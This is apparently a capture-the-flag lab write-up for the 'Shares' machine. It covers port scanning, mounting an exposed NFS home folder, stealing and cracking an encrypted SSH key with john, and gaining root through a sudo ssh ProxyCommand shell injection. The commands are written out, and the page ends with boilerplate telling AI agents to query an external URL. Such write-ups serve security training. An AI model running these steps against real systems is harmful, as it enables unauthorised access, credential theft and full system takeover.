# Shares
## nmap
```
mkdir nmap
sudo rustscan -a 172.31.1.7 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
```
## Enumeration
A file system is open on port 2049, and ssh is weirdly open on port 27853
Looks like we can mount the home folder of user `amir`
We can mount it by executing the following
```
mkdir /tmp/amir
sudo mount -t nfs 172.31.1.7:/home/amir /tmp/amir
```
Upon digging in the file system, you will notice there's an ssh key inside .ssh folder.
Copy `id_rsa` to your working directory, and `chmod` it.
```
cp id_rsa ~/infosec/cyberseclabs/shares/amir_id_rsa
chmod +x amir_id_rsa
```
The ssh key is encrypted, it means we have to crack this with `john`
```
ssh2john amir_id_rsa > amir_id_rsa.ssh2john
john amir_id_rsa.ssh2john -w=/opt/wordlist/rockyou.txt
```
After a few seconds, you will be able to get the password.
## Initial foothold
Using the SSH key, the cracked password, and the knowledge of user `amir` being existed. Now we can log in. Sweet :D
## Privilege Escalation
We can execute python3 as user `amy`
We can leverage that and gain a shell as `amy`
And with user amy, we can run sudo command with ssh
Now we can gain root, by executing the following
```
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
```
Enjoy your root privilege. :D
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://psdon.gitbook.io/hackworld/writeup/cyberseclab/shares.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.